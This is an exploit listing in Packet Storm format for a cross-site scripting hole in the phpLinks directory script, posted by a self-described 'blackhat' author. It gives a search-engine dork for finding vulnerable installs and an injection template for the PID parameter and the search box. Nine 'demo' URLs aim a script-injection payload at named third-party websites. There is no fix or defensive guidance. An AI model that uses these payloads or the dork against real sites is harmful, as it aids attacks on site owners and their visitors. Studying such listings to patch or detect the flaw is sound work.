phpLinks Cross Site Scripting

2013-09-16T00:00:00
ID PACKETSTORM:123240
Type packetstorm
Reporter Arsan
Modified 2013-09-16T00:00:00

Description

                                        
                                            `#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#  
#  
# Exploit Title: PhpLinks Cross Site Scripting Vulnerability  
# Date: 2013 15 September  
# Author: Arsan  
# Vendor Homepage: www.newphplinks.com  
# Version : All Version  
# Tested on: Linux & Windows  
# Category: webapps  
# Google Keywords: inurl:"/index.php?PID=" intext:"Powered By phpLinks"  
#  
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#  
#  
# [+] Exploit :  
#  
# http://<server>/index.php?PID=[XSS]  
# http://<server>/[XSS In SearchBox]  
#  
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#  
#  
# [+] Demo :  
#  
# www.net-sleuth.com/index.php?PID=5"><script>alert(/Arsan/)</script>  
# www.eheli.at/phplinks/index.php?PID=5"><script>alert(/Arsan/)</script>  
# www.ingegneriambientali.it/cercambiente/index.php?PID=5"><script>alert(/Arsan/)</script>  
# www.touristinfo.it/index.php?PID=205"><script>alert(/Arsan/)</script>  
# www.lupus.france-timbres.net/index.php?PID=10"><script>alert(/Arsan/)</script>  
# www.links.svalbard.com/index.php?PID=3"><script>alert(/Arsan/)</script>  
# www.remodelnet.com/links/index.php?PID=6"><script>alert(/Arsan/)</script>  
# www.dietrich.kracht.free.fr/phplinks/index.php?PID=4"><script>alert(/Arsan/)</script>  
# www.myav.com.tw/avlinks/index.php?PID=5"><script>alert(/Arsan/)</script>  
#  
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#  
#  
# [+] Contact Me :  
#  
# Arsan.Blackhat@gmail.com  
# Twitter.com/ArsanBlackhat  
#   
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#  
# I L0ve Inj3ct0r Team  
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#  
`